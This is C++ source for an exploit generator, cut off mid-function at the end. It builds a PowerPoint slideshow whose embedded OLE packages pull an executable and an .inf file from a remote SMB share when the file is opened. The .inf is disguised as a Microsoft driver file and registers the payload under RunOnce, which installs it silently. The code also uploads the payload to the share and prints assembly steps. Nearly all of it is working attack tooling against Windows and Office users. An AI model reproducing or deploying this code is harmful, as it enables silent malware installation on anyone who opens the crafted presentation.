  1. /*++
  2. Title:
  3. Windows NT 6.X OLE package manager remote code execution through
  4. MS Office Powerpoint XYZ slideshow (ppts, pptxs).
  5.  
  6. EID:
  7. 00000217:2013/06/10
  8.  
  9. Description:
  10. Undocumented features exist in Windows NT 6 OLE package manager.
  11. These features allow to bypass 'Safe download' mechanism from
  12. untrusted sources and to execute imm. The IContextMenu i-face
  13. is used by 3-rd party software (such as MS Office Powerpoint XYZ)
  14. to unpack and dispatch package data. Shell action to be applied
  15. to package is specified by action id in 'cmd' parameter of slide
  16. xml-based document. Action Id '-1' and '-2' are reserved by MS
  17. Office Powerpoint engine. Currently, silent '.inf' installation
  18. is used for mitigation bypass. The MS Office for Windows XP
  19. contains internal OLE Package interpreter, so Windows XP doesn't
  20. affected.
  21. Hi F-5ecure and E5et! We are offering you to patch holes and
  22. backdoors in your fucking AV-s. We know about them.
  23.  
  24. Discovered:
  25. 2013/06/06
  26.  
  27. --*/
  28.  
  29. #include <Windows.h>
  30. #include <OleAuto.h>
  31. #include <stdio.h>
  32. #include <OAIdl.h>
  33. #include <string>
  34. #include <shldisp.h>
  35. #include <tlhelp32.h>
  36. #include <assert.h>
  37.  
  38. using namespace std;
  39.  
  40. #define MAKE_OFFICE_IMPORT 0
  41.  
  42. #if MAKE_OFFICE_IMPORT
  43. #import "z:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\VBA6\\VBE6EXT.OLB"
  44. #import "z:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE12\\mso.dll"
  45. #import "z:\\Program Files (x86)\\Microsoft Office\\Office12\\msppt.olb"
  46.  
  47. /* Modify office headers after import.
  48. In file vbe6ext.tlh specify:
  49. #include "mso.tlh"
  50. using namespace Office;
  51.  
  52. In file msppt.tlh specify:
  53. #include "vbe6ext.tlh"
  54. using namespace VBIDE;
  55. */
  56.  
  57. #else
  58.  
  59. #if _DEBUG
  60.  
  61. #include "Debug\mso.tlh"
  62. #include "Debug\vbe6ext.tlh"
  63. #include "Debug\msppt.tlh"
  64.  
  65. #else
  66.  
  67. #include "Release\mso.tlh"
  68. #include "Release\vbe6ext.tlh"
  69. #include "Release\msppt.tlh"
  70.  
  71. #endif
  72.  
  73. #endif
  74.  
  75. /* Processor definitions
  76. */
  77. static HRESULT __G_hresult = S_OK;
  78.  
  79. #define CHK_HR( hr ) do { if (FAILED(__G_hresult = (hr))) { goto _Done; } } while(0)
  80.  
  81. #define CHK_ALLOC( ptr ) do { if ((ptr) == NULL) {goto _Done; } } while(0)
  82.  
  83. #define SAFE_RELEASE_BY_REF( obj ) do { if((*obj) != NULL) { (*obj )->Release(); *obj = NULL;} } while(0)
  84.  
  85. #define SAFE_FREE_BSTR_BY_REF( obj ) do { if((*obj) != NULL) { SysFreeString((*obj)); (*obj) = NULL;} } while(0)
  86.  
  87. #define VariantInitAsLong( var, val) \
  88. VariantInit( &(var) ); \
  89. (var).vt = VT_I4; \
  90. (var).lVal = val;
  91.  
  92.  
  93. /*************************************************************************
  94. Rtns definition
  95. *************************************************************************/
  96. int wmain(int argc, wchar_t **argv);
  97. bool change_file_time(__in wchar_t *fname);
  98. void print_usage_and_exit(__in wchar_t *exe);
  99. bool produce_presentation(__in wchar_t *fname, __in wchar_t *fnameSaveAs, __in wchar_t *fname1Tmp, __in wchar_t *fname2Tmp);
  100. bool presentation_does_have_ole_packages(__in PowerPoint::_Presentation *pPresentation, __out bool *doesHave);
  101. bool create_ole_embed_stg_copy(__in const wchar_t *file_result, __in char *str1, __in char *str2);
  102. bool rewrite_embeddings_in_presentation(__in wchar_t *fnamePpt, __in wchar_t *fnameData);
  103. bool parse_cmd(int argc, wchar_t **argv, wstring *fnamePptIn, wstring *smbPath, wstring *fnameExe,wstring *fnameExeOnSmb,wstring *fnameInfOnSmb, bool *bForceUpload);
  104.  
  105.  
  106. /*************************************************************************
  107. Rtns implementation
  108. *************************************************************************/
  109. bool produce_presentation(__in wchar_t *fname, __in wchar_t *fnameSaveAs, __in wchar_t *fname1Tmp, __in wchar_t *fname2Tmp) {
  110.  
  111. wstring stdWstrFileSaveAs;
  112. PowerPoint::PpSaveAsFileType saveAsType;
  113. bool bres = false,
  114. bDoesHaveOlePackages = false;
  115. CLSID appClsid = { 0 };
  116. BSTR bstrApplicationProgId = NULL,
  117. bstrPresentationPath = NULL,
  118. bstrSaveAs = NULL;
  119. PowerPoint::_Application *pApplication = NULL;
  120. PowerPoint::Presentations *pPresentations = NULL;
  121. PowerPoint::_Presentation *pPresentation = NULL;
  122. PowerPoint::Slides *pSlides = NULL;
  123. PowerPoint::_Slide *pSlide = NULL;
  124. PowerPoint::Shapes *pShapes = NULL;
  125. PowerPoint::Shape *pShape0 = NULL,
  126. *pShape1 = NULL,
  127. *pShapeCurr = NULL;
  128. PowerPoint::TimeLine *pTimeLine = NULL;
  129. PowerPoint::Sequences *pSequences = NULL;
  130. PowerPoint::Sequence *pSequence = NULL;
  131. PowerPoint::Effect *pEffect = NULL;
  132. PowerPoint::AnimationBehaviors *pAnimationBehaviors = NULL;
  133. PowerPoint::AnimationBehavior *pAnimationBehavior = NULL;
  134. PowerPoint::CommandEffect *pCommandEffect = NULL;
  135. PowerPoint::SlideShowTransition *pSlideShowTransition = NULL;
  136. VARIANT varSlideIndex;
  137.  
  138.  
  139. /* Produce file name for saving
  140. */
  141. stdWstrFileSaveAs.append(fnameSaveAs);
  142.  
  143. saveAsType = PowerPoint::PpSaveAsFileType::ppSaveAsOpenXMLShow;
  144.  
  145. CHK_ALLOC( bstrApplicationProgId = SysAllocString(L"Powerpoint.Application"));
  146.  
  147. /* Obtain POwerPoint App CLSID from PowerPoint App Identifier
  148. */
  149. CHK_HR( CLSIDFromProgID( bstrApplicationProgId, &appClsid) );
  150.  
  151. /* Create instance of POWERPOINT Application
  152. */
  153. CHK_HR( CoCreateInstance(
  154. appClsid,
  155. NULL,
  156. CLSCTX_LOCAL_SERVER,
  157. __uuidof(PowerPoint::_Application),
  158. (LPVOID*)&pApplication) );
  159.  
  160. /* Get presentation collection
  161. */
  162. CHK_HR( pApplication ->get_Presentations(&pPresentations) );
  163.  
  164. /* Open presentation
  165. */
  166. CHK_ALLOC( bstrPresentationPath = SysAllocString(fname) );
  167.  
  168. CHK_HR( pPresentations ->raw_Open(
  169. bstrPresentationPath,
  170. Office::MsoTriState::msoFalse,
  171. Office::MsoTriState::msoFalse,
  172. Office::MsoTriState::msoFalse,
  173. &pPresentation) );
  174.  
  175. /* Make sure that presentation doesn't have a lot of ole packages
  176. */
  177. if (!presentation_does_have_ole_packages(pPresentation, &bDoesHaveOlePackages)) {
  178.  
  179. CHK_HR( E_ABORT );
  180. }
  181.  
  182. if (bDoesHaveOlePackages) {
  183.  
  184. printf("[-] ERROR: Specified presentation already includes OLE objects or no slides found.\n");
  185.  
  186. CHK_HR( E_ABORT );
  187. }
  188.  
  189. /* Get collection of slides
  190. */
  191.  
  192. CHK_HR( pPresentation ->get_Slides( &pSlides) );
  193.  
  194. /* Get first slide by index
  195. */
  196. VariantInitAsLong(varSlideIndex, 1);
  197.  
  198. CHK_HR( pSlides ->raw_Item( varSlideIndex, &pSlide) );
  199.  
  200. /* Get collection of shapes in slide
  201. */
  202. CHK_HR( pSlide ->get_Shapes( &pShapes) );
  203.  
  204. /* Add 1-th shape to slide as first OLE object
  205. */
  206. CHK_HR( pShapes ->raw_AddOLEObject(
  207. 100.0, -100.0, 30.0, 30.0,
  208. _bstr_t(L""),
  209. _bstr_t(fname1Tmp),
  210. Office::MsoTriState::msoFalse,
  211. _bstr_t(L""),
  212. 0,
  213. _bstr_t(L""),
  214. Office::MsoTriState::msoFalse,
  215. &pShape0
  216. ) );
  217.  
  218. /* Add 2-th shape to slide as second OLE object
  219. */
  220. CHK_HR( pShapes ->raw_AddOLEObject(
  221. 150.0, -100.0, 30.0, 30.0,
  222. _bstr_t(L""),
  223. _bstr_t(fname2Tmp),
  224. Office::MsoTriState::msoFalse,
  225. _bstr_t(L""),
  226. 0,
  227. _bstr_t(L""),
  228. Office::MsoTriState::msoFalse,
  229. &pShape1
  230. ) );
  231.  
  232. /* Configure slide timing
  233. */
  234. CHK_HR( pSlide ->get_TimeLine( &pTimeLine ) );
  235.  
  236. /* Obtain Main Sequence for timeLine of slide
  237. */
  238. CHK_HR( pTimeLine ->get_MainSequence( &pSequence) );
  239.  
  240. /* Produce first effect for 1-th shape.
  241. 1-th shape specifies OLE Object which just copies .exe payload
  242. from remote SMB server and stores in temporary file.
  243. Specify command verb as '-3' which tells to ShellApi do nothing.
  244. Effect with id 1 loads slide background.
  245. Effect with id 2 loads exe stub from remote server.
  246. */
  247. {
  248. CHK_HR( pSequence ->raw_AddEffect(
  249. pShape0,
  250. PowerPoint::MsoAnimEffect::msoAnimEffectFlashOnce,
  251. PowerPoint::MsoAnimateByLevel::msoAnimateLevelNone,
  252. PowerPoint::MsoAnimTriggerType::msoAnimTriggerWithPrevious, //PowerPoint::MsoAnimTriggerType::msoAnimTriggerOnPageClick,
  253. 1,
  254. &pEffect) );
  255.  
  256. SAFE_RELEASE_BY_REF( &pEffect );
  257.  
  258. CHK_HR( pSequence ->raw_AddEffect(
  259. pShape0,
  260. PowerPoint::MsoAnimEffect::msoAnimEffectFlashOnce,
  261. PowerPoint::MsoAnimateByLevel::msoAnimateLevelNone,
  262. PowerPoint::MsoAnimTriggerType::msoAnimTriggerAfterPrevious, //PowerPoint::MsoAnimTriggerType::msoAnimTriggerOnPageClick,
  263. 2,
  264. &pEffect) );
  265.  
  266.  
  267. CHK_HR( pEffect ->get_Behaviors( &pAnimationBehaviors) );
  268.  
  269. CHK_HR( pAnimationBehaviors ->raw_Add( PowerPoint::MsoAnimType::msoAnimTypeCommand, 1, &pAnimationBehavior) );
  270.  
  271. CHK_HR( pAnimationBehavior ->get_CommandEffect( &pCommandEffect) );
  272.  
  273. CHK_HR( pCommandEffect ->put_Type( PowerPoint::MsoAnimCommandType::msoAnimCommandTypeVerb) );
  274.  
  275. CHK_HR( pCommandEffect ->put_Command( _bstr_t(L"-3")) );
  276. }
  277.  
  278. /* Release resources assigned with Shape0
  279. */
  280. SAFE_RELEASE_BY_REF( &pCommandEffect );
  281. SAFE_RELEASE_BY_REF( &pAnimationBehavior );
  282. SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
  283. SAFE_RELEASE_BY_REF( &pEffect );
  284. SAFE_RELEASE_BY_REF( &pShape0 );
  285.  
  286. /* Produce first effect for 2-th shape.
  287. 2-th shape specifies OLE Object which simple copies .inf file
  288. from remote SMB server and stores in temporary file with .inf extension.
  289. Specify command verb as '3' which tells to ShellApi do 'Install' action.
  290. Effect with id 3 loads .inf from remote server and start it.
  291. */
  292. {
  293. CHK_HR( pSequence ->raw_AddEffect(
  294. pShape1,
  295. PowerPoint::MsoAnimEffect::msoAnimEffectFlashOnce,
  296. PowerPoint::MsoAnimateByLevel::msoAnimateLevelNone,
  297. PowerPoint::MsoAnimTriggerType::msoAnimTriggerAfterPrevious,
  298. 3,
  299. &pEffect) );
  300.  
  301.  
  302. CHK_HR( pEffect ->get_Behaviors( &pAnimationBehaviors) );
  303.  
  304. CHK_HR( pAnimationBehaviors ->raw_Add( PowerPoint::MsoAnimType::msoAnimTypeCommand, 1, &pAnimationBehavior) );
  305.  
  306. CHK_HR( pAnimationBehavior ->get_CommandEffect( &pCommandEffect) );
  307.  
  308. CHK_HR( pCommandEffect ->put_Type( PowerPoint::MsoAnimCommandType::msoAnimCommandTypeVerb) );
  309.  
  310. CHK_HR( pCommandEffect ->put_Command( _bstr_t(L"3")) );
  311. }
  312. /* Release resources assigned with Shape1
  313. */
  314. SAFE_RELEASE_BY_REF( &pCommandEffect );
  315. SAFE_RELEASE_BY_REF( &pAnimationBehavior );
  316. SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
  317. SAFE_RELEASE_BY_REF( &pEffect );
  318. SAFE_RELEASE_BY_REF( &pShape1 );
  319.  
  320. /* Configure SlideShowTransition
  321. */
  322.  
  323. CHK_HR( pSlide ->get_SlideShowTransition(&pSlideShowTransition) );
  324.  
  325. CHK_HR( pSlideShowTransition ->put_EntryEffect( PowerPoint::PpEntryEffect::ppEffectBoxOut ) );
  326.  
  327. CHK_HR( pSlideShowTransition ->put_AdvanceTime( 0.5 ) );
  328.  
  329. SAFE_RELEASE_BY_REF( &pSlideShowTransition );
  330.  
  331.  
  332. /* Release resources assigned with Presentation
  333. */
  334. SAFE_RELEASE_BY_REF( &pSequence );
  335. SAFE_RELEASE_BY_REF( &pTimeLine );
  336. SAFE_RELEASE_BY_REF( &pShapes );
  337. SAFE_RELEASE_BY_REF( &pSlide );
  338. SAFE_RELEASE_BY_REF( &pSlides );
  339.  
  340.  
  341. /* Save presentation
  342. */
  343. CHK_ALLOC(bstrSaveAs = SysAllocString(stdWstrFileSaveAs.c_str()) );
  344.  
  345. CHK_HR( pPresentation ->raw_SaveAs( bstrSaveAs, saveAsType, Office::MsoTriState::msoTriStateMixed) );
  346.  
  347. bres = true;
  348.  
  349. _Done:
  350.  
  351. VariantClear( &varSlideIndex );
  352.  
  353. SAFE_FREE_BSTR_BY_REF( &bstrPresentationPath );
  354.  
  355. SAFE_FREE_BSTR_BY_REF( &bstrApplicationProgId );
  356.  
  357. SAFE_FREE_BSTR_BY_REF( &bstrSaveAs );
  358.  
  359. /* Release resources assigned with Shape0 and Shape1
  360. */
  361. SAFE_RELEASE_BY_REF( &pCommandEffect );
  362. SAFE_RELEASE_BY_REF( &pAnimationBehavior );
  363. SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
  364. SAFE_RELEASE_BY_REF( &pEffect );
  365. SAFE_RELEASE_BY_REF( &pShape0 );
  366. SAFE_RELEASE_BY_REF( &pShape1 );
  367.  
  368. /* Release resources assigned with Presentation
  369. */
  370. SAFE_RELEASE_BY_REF( &pSlideShowTransition );
  371. SAFE_RELEASE_BY_REF( &pSequence );
  372. SAFE_RELEASE_BY_REF( &pTimeLine );
  373. SAFE_RELEASE_BY_REF( &pShapes );
  374. SAFE_RELEASE_BY_REF( &pSlide );
  375. SAFE_RELEASE_BY_REF( &pSlides );
  376.  
  377. /* Close Currently opened presentation
  378. */
  379. if (pPresentation) {
  380.  
  381. pPresentation ->raw_Close();
  382. }
  383. SAFE_RELEASE_BY_REF( &pPresentation );
  384.  
  385. SAFE_RELEASE_BY_REF( &pPresentations );
  386.  
  387. /* Close powerpoint automation application
  388. */
  389. if (pApplication) {
  390.  
  391. pApplication ->raw_Quit();
  392. }
  393.  
  394. SAFE_RELEASE_BY_REF( &pApplication );
  395.  
  396. return bres;
  397. }
  398.  
  399. bool create_ole_embed_stg_copy(__in const wchar_t *file_result, __in char *str1, __in char *str2) {
  400.  
  401. bool bresult = false;
  402. IStorage *pStorage = NULL;
  403. IStream *pStream = NULL;
  404. HRESULT hresult = S_OK;
  405. CLSID clsidMedia = {0};
  406. VOID *pvFileData = NULL;
  407. size_t dataSize = 0;
  408. ULONG bytesWritten = 0;
  409. char trailer = 0;
  410. wstring stdWstrFileNameOut;
  411.  
  412.  
  413. stdWstrFileNameOut.append(file_result);
  414.  
  415. hresult =
  416. StgCreateStorageEx(
  417. stdWstrFileNameOut.c_str(),
  418. STGM_CREATE | STGM_SHARE_EXCLUSIVE | STGM_READWRITE,
  419. STGFMT_STORAGE,
  420. 0,
  421. NULL,
  422. NULL,
  423. IID_IStorage,
  424. (void**)&pStorage
  425. );
  426.  
  427. if (FAILED(hresult)) {
  428.  
  429. //printf("[-] %s(): StgCreateStorageEx failed with error: %d(%08x)\r\n", __FUNCTION__, hresult, hresult);
  430.  
  431. CHK_HR(hresult);
  432. }
  433.  
  434. hresult =
  435. pStorage ->CreateStream(
  436. L"\x01OLE10Native",
  437. STGM_CREATE | STGM_SHARE_EXCLUSIVE | STGM_READWRITE,
  438. 0,
  439. 0,
  440. &pStream
  441. );
  442.  
  443. if (FAILED(hresult)) {
  444.  
  445. //printf("[-] %s(): IStorage::CreateStream failed with error: %d(%08x)\r\n", __FUNCTION__, hresult, hresult);
  446.  
  447. CHK_HR(hresult);
  448. }
  449.  
  450. dataSize = strlen(str1) + 1 + strlen(str2) + 1;
  451.  
  452.  
  453. // write header
  454. hresult = pStream ->Write( &dataSize, (ULONG)4, &bytesWritten );
  455.  
  456. if (FAILED(hresult)) {
  457.  
  458. //printf("[-] %s(): IStream::Write(header) failed with error %d(%08x)\r\n", __FUNCTION__, hresult, hresult);
  459.  
  460. CHK_HR(E_ABORT);
  461. }
  462.  
  463. // write string 1
  464. hresult = pStream ->Write( str1, (ULONG)strlen(str1), &bytesWritten );
  465.  
  466. if (FAILED(hresult)) {
  467.  
  468. //printf("[-] %s(): IStream::Write(string#1) failed with error %d(%08x)\r\n", __FUNCTION__, hresult, hresult);
  469.  
  470. CHK_HR(E_ABORT);
  471. }
  472.  
  473. // write string 1 trailer
  474. hresult = pStream ->Write( &trailer, (ULONG)1, &bytesWritten );
  475.  
  476. if (FAILED(hresult)) {
  477.  
  478. //printf("[-] %s(): IStream::Write(string#1 trailer) failed with error %d(%08x)\r\n", __FUNCTION__, hresult, hresult);
  479.  
  480. CHK_HR(E_ABORT);
  481. }
  482.  
  483. // write string 2
  484. hresult = pStream ->Write( str2, (ULONG)strlen(str2), &bytesWritten );
  485.  
  486. if (FAILED(hresult)) {
  487.  
  488. //printf("[-] %s(): IStream::Write(string#2) failed with error %d(%08x)\r\n", __FUNCTION__, hresult, hresult);
  489.  
  490. CHK_HR(E_ABORT);
  491. }
  492.  
  493. // write string 2 trailer
  494. hresult = pStream ->Write( &trailer, (ULONG)1, &bytesWritten );
  495.  
  496. if (FAILED(hresult)) {
  497.  
  498. //printf("[-] %s(): IStream::Write(string#2 trailer) failed with error %d(%08x)\r\n", __FUNCTION__, hresult, hresult);
  499.  
  500. CHK_HR(E_ABORT);
  501. }
  502.  
  503. // write class of storage
  504. hresult = CLSIDFromString( L"{00022602-0000-0000-C000-000000000046}", &clsidMedia);
  505.  
  506. if (FAILED(hresult)) {
  507.  
  508. //printf("[-] %s(): CLSIDFromString failed with error %d(%08x)\r\n", __FUNCTION__, hresult, hresult);
  509.  
  510. CHK_HR(E_ABORT);
  511. }
  512.  
  513. hresult = WriteClassStg(pStorage, clsidMedia);
  514.  
  515. if (FAILED(hresult)) {
  516.  
  517. //printf("[-] %s(): WriteClassStg failed with error %d(%08x)\r\n", __FUNCTION__, hresult, hresult);
  518.  
  519. CHK_HR(hresult);
  520. }
  521.  
  522. //printf("[+] %s(): Storage %S created.\r\n", __FUNCTION__, file_result);
  523. change_file_time( (wchar_t*)stdWstrFileNameOut.c_str() );
  524.  
  525. bresult = true;
  526.  
  527. _Done:
  528. SAFE_RELEASE_BY_REF( &pStream );
  529.  
  530. SAFE_RELEASE_BY_REF( &pStorage );
  531.  
  532. if(pvFileData) {
  533.  
  534. free(pvFileData);
  535. }
  536.  
  537. return bresult;
  538.  
  539. }
  540.  
  541. bool create_somthing_file(wchar_t *fpath) {
  542.  
  543. HANDLE hFile = INVALID_HANDLE_VALUE;
  544. DWORD bytesWritten = 0;
  545.  
  546. hFile = CreateFileW(fpath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
  547. if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {
  548.  
  549. wprintf(L"[-] ERROR: Cannot create temporary file %s with some data\n", fpath);
  550.  
  551. return false;
  552. }
  553.  
  554. if (FALSE == WriteFile( hFile, "Some Data\n", strlen("Some Data\n"), &bytesWritten, NULL)) {
  555.  
  556. wprintf(L"[-] ERROR: Cannot write temporary file %s with some data\n", fpath);
  557.  
  558. CloseHandle(hFile);
  559.  
  560. return false;
  561. }
  562.  
  563. CloseHandle(hFile);
  564.  
  565. return true;
  566. }
  567.  
  568. bool generate_inf_file(wchar_t *fnameInf, wchar_t *fnameExeOnSmb) {
  569.  
  570. HANDLE hFile = INVALID_HANDLE_VALUE;
  571. DWORD bytesWritten = 0;
  572. wstring stdFnameExeOnSmb;
  573. string stdFnameExeOnSmbA;
  574. string data;
  575. BOOL bres = FALSE;
  576.  
  577. stdFnameExeOnSmb.append(fnameExeOnSmb);
  578. stdFnameExeOnSmbA.append(stdFnameExeOnSmb.begin(), stdFnameExeOnSmb.end());
  579.  
  580. hFile = CreateFileW( fnameInf, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
  581. if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {
  582.  
  583. wprintf(L"[-] ERROR: Cannot create temporary file %s with some data\n", fnameInf);
  584.  
  585. return false;
  586. }
  587.  
  588. data.append("; 61883.INF\n");
  589. data.append("; Copyright (c) Microsoft Corporation. All rights reserved.\n\n");
  590.  
  591. data.append("[Version]\n");
  592. data.append("Signature = \"$CHICAGO$\"\n");
  593. data.append("Class=61883\n");
  594. data.append("ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}\n");
  595. data.append("Provider=%Msft%\n");
  596. data.append("DriverVer=06/21/2006,6.1.7600.16385\n\n");
  597.  
  598. data.append("[DestinationDirs]\n");
  599. data.append("DefaultDestDir = 1\n\n");
  600.  
  601. data.append("[DefaultInstall]\n");
  602. data.append("RenFiles = RxRename\n");
  603. data.append("AddReg = RxStart\n\n");
  604.  
  605. data.append("[RxRename]\n");
  606. data.append(stdFnameExeOnSmbA.c_str());
  607. data.append(".exe, ");
  608. data.append(stdFnameExeOnSmbA.c_str());
  609. data.append("\n");
  610.  
  611. data.append("[RxStart]\n");
  612. data.append("HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\");
  613. data.append(stdFnameExeOnSmbA.c_str());
  614. data.append(".exe\n");
  615.  
  616. bres = WriteFile(hFile, data.c_str(), data.length(), &bytesWritten, NULL);
  617.  
  618. FlushFileBuffers(hFile);
  619.  
  620. CloseHandle(hFile);
  621.  
  622. return (bres);
  623. }
  624.  
  625. int wmain(int argc, wchar_t **argv) {
  626.  
  627.  
  628. wstring stdWstrSaveAs,
  629. stdWstrObject1,
  630. stdWstrObject2,
  631. stdWstrSavedAs;
  632.  
  633. wstring stdFnamePptIn,
  634. stdSmbPath,
  635. stdFnameExe,
  636. stdFnameExeOnSmb,
  637. stdFnameInfOnSmb,
  638. stdPathExeOnSmb,
  639. stdPathInfOnSmb,
  640. stdPathTmp1,
  641. stdPathTmp2,
  642. stdPathInf,
  643. stdPathExe;
  644. string stdPathExeOnSmbA,
  645. stdPathInfOnSmbA;
  646.  
  647. bool bForceUpload = false;
  648.  
  649. wchar_t currDir[MAX_PATH];
  650.  
  651.  
  652. GetCurrentDirectoryW(MAX_PATH, currDir);
  653.  
  654.  
  655. if (!parse_cmd(argc, argv, &stdFnamePptIn, &stdSmbPath, &stdFnameExe, &stdFnameExeOnSmb, &stdFnameInfOnSmb, &bForceUpload ) ) {
  656.  
  657. printf("[-] ERROR: invalid input\n");
  658.  
  659. return 0;
  660. }
  661.  
  662.  
  663. CHK_HR( CoInitializeEx(NULL, COINIT_APARTMENTTHREADED));
  664.  
  665. stdWstrSaveAs.append(stdFnamePptIn.c_str());
  666.  
  667. stdWstrSaveAs.append(L".saved.ppsx");
  668.  
  669. /* Construct a path to exe on SMB as %stdSmbPath%\%stdFnameExeOnSmb%
  670. */
  671. stdPathExeOnSmb.append(stdSmbPath.c_str());
  672. stdPathExeOnSmb.append(L"\\");
  673. stdPathExeOnSmb.append(stdFnameExeOnSmb.c_str());
  674. stdPathExeOnSmbA.append(stdPathExeOnSmb.begin(), stdPathExeOnSmb.end());
  675.  
  676. /* Construct a path to inf on SMB as %stdSmbPath%\%stdFnameInfOnSmb%
  677. */
  678. stdPathInfOnSmb.append(stdSmbPath.c_str());
  679. stdPathInfOnSmb.append(L"\\");
  680. stdPathInfOnSmb.append(stdFnameInfOnSmb.c_str());
  681. stdPathInfOnSmbA.append(stdPathInfOnSmb.begin(), stdPathInfOnSmb.end());
  682.  
  683. /* Construct a path to tmp1 file
  684. */
  685. stdPathTmp1.append(currDir);
  686. stdPathTmp1.append(L"\\tmp1.tmp");
  687.  
  688. if (!create_somthing_file((wchar_t*)stdPathTmp1.c_str()) ) {
  689.  
  690. CHK_HR(E_ABORT);
  691. }
  692.  
  693. /* Construct a path to tmp2 file
  694. */
  695. stdPathTmp2.append(currDir);
  696. stdPathTmp2.append(L"\\tmp2.tmp");
  697.  
  698. if (!create_somthing_file((wchar_t*)stdPathTmp2.c_str()) ) {
  699.  
  700. CHK_HR(E_ABORT);
  701. }
  702.  
  703.  
  704. /* Modify presentation imm
  705. */
  706. if (!produce_presentation(
  707. (wchar_t*)stdFnamePptIn.c_str(),
  708. (wchar_t *)stdWstrSaveAs.c_str(),
  709. (wchar_t *) stdPathTmp1.c_str(),
  710. (wchar_t *) stdPathTmp2.c_str()
  711. ) )
  712. {
  713.  
  714. printf("[-] ERROR: cannot update presentation\n");
  715.  
  716. CHK_HR( E_ABORT);
  717. }
  718.  
  719. /* Create OLE 1-th Object
  720. */
  721. stdWstrObject1.append(currDir);
  722. stdWstrObject1.append(L"\\");
  723. stdWstrObject1.append(L"oleObject1.bin");
  724.  
  725. if (!create_ole_embed_stg_copy(stdWstrObject1.c_str(), "EmbeddedStg1.txt", (char*)stdPathExeOnSmbA.c_str()) ) {
  726.  
  727. printf("[-] ERROR: cannot create 1-th OLE Object\n");
  728.  
  729. CHK_HR( E_ABORT);
  730. }
  731.  
  732. /* Create OLE 2-th Object
  733. */
  734. stdWstrObject2.append(currDir);
  735. stdWstrObject2.append(L"\\");
  736. stdWstrObject2.append(L"oleObject2.bin");
  737. if (!create_ole_embed_stg_copy(stdWstrObject2.c_str(), "EmbeddedStg2.txt", (char*)stdPathInfOnSmbA.c_str()) ) {
  738.  
  739. printf("[-] ERROR: cannot create 2-th OLE Object\n");
  740.  
  741. CHK_HR( E_ABORT);
  742. }
  743.  
  744. /* Generate inf file
  745. */
  746. stdPathInf.append(currDir);
  747. stdPathInf.append(L"\\");
  748. stdPathInf.append(stdFnameInfOnSmb.c_str());
  749.  
  750. if (!generate_inf_file((wchar_t*)stdPathInf.c_str(), (wchar_t*)stdFnameExeOnSmb.c_str())) {
  751.  
  752. printf("[-] ERROR: Cannot generate inf file\n");
  753. CHK_HR(E_ABORT);
  754. }
  755.  
  756. /* Generate exe for SMB
  757. */
  758. stdPathExe.append(currDir);
  759. stdPathExe.append(L"\\");
  760. stdPathExe.append(stdFnameExeOnSmb.c_str());
  761.  
  762. if (!CopyFileW(stdFnameExe.c_str(), stdPathExe.c_str(), FALSE)) {
  763. wprintf(L"[-] ERROR: Cannot create '%s' from '%s'\n", stdFnameExeOnSmb.c_str(), stdFnameExe.c_str());
  764.  
  765. CHK_HR(E_ABORT);
  766. }
  767.  
  768. /* Upload files onto remote shared folder
  769. */
  770. if (bForceUpload) {
  771.  
  772. if (!CopyFileW( stdPathExe.c_str(), stdPathExeOnSmb.c_str(), FALSE)) {
  773.  
  774. wprintf(L"[-] ERROR: Cannot upload .exe file '%s' to '%s'\n", stdPathExe.c_str(), stdSmbPath.c_str());
  775. }
  776.  
  777. if (!CopyFileW( stdPathInf.c_str(), stdPathInfOnSmb.c_str(), FALSE)) {
  778.  
  779. wprintf(L"[-] ERROR: Cannot upload .inf file '%s' to '%s'\n", stdPathInf.c_str(), stdSmbPath.c_str());
  780. }
  781. }
  782. int step = 1;
  783. wprintf(L"[+] INFO: \n");
  784. wprintf(L" %d) Rename presentation file '%s' to '%s.zip';\n", step++, stdWstrSavedAs.c_str(), stdWstrSavedAs.c_str());
  785. wprintf(L" %d) Stupid MS developers cann't create API for zip, so unzip '%s.zip'\n", step++, stdWstrSavedAs.c_str());
  786. wprintf(L" %d) Copy '%s' into 'ppt/embeddings' sub-directory of unzipped file;\n", step++, stdWstrObject1.c_str());
  787. wprintf(L" %d) Copy '%s' into 'ppt/embeddings' sub-directory of unzipped file;\n", step++, stdWstrObject2.c_str());
  788. wprintf(L" %d) Zip unzipped presentation and rename to presentation with '.ppsx'\n", step++);
  789. if (bForceUpload) {
  790. wprintf(L" %d) Copy '%s' into '%s'\n", step++, stdFnameExeOnSmb.c_str(), stdSmbPath.c_str());
  791. wprintf(L" %d) Copy '%s' into '%s'\n", step++, stdFnameInfOnSmb.c_str(), stdSmbPath.c_str());
  792. }
  793. wprintf(L" %d) Enjoy..\n", step++);
  794.  
  795.  
  796. _Done:
  797.  
  798. DeleteFileW( stdPathTmp1.c_str());
  799.  
  800. DeleteFileW( stdPathTmp2.c_str());
  801.  
  802. CoUninitialize();
  803.  
  804. return(__G_hresult);
  805. }
  806.  
  807. bool presentation_does_have_ole_packages(__in PowerPoint::_Presentation *pPresentation, __out bool *doesHave) {
  808.  
  809. bool bres = false;
  810. PowerPoint::Slides *pSlides = NULL;
  811. PowerPoint::_Slide *pSlide = NULL;
  812. PowerPoint::Shapes *pShapes = NULL;
  813. PowerPoint::Shape *pShape = NULL;
  814. PowerPoint::OLEFormat *pOLEFormat = NULL;
  815. long slidesCount = 0;
  816. VARIANT varSlideIndex,
  817. varShapeIndex;
  818. int shapesCount = 0;
  819. MsoAutoShapeType shapeType;
  820. BSTR bstrProgId = NULL;
  821. IDispatch *pOLEDispObject = NULL;
  822.  
  823.  
  824.  
  825. assert(doesHave != NULL);
  826. assert(pPresentation != NULL);
  827.  
  828. *doesHave = false;
  829.  
  830. /* Get pointer to interface of Slides object.
  831. */
  832. CHK_HR(pPresentation ->get_Slides(&pSlides) );
  833.  
  834.  
  835. /* Get count of slides in presentation
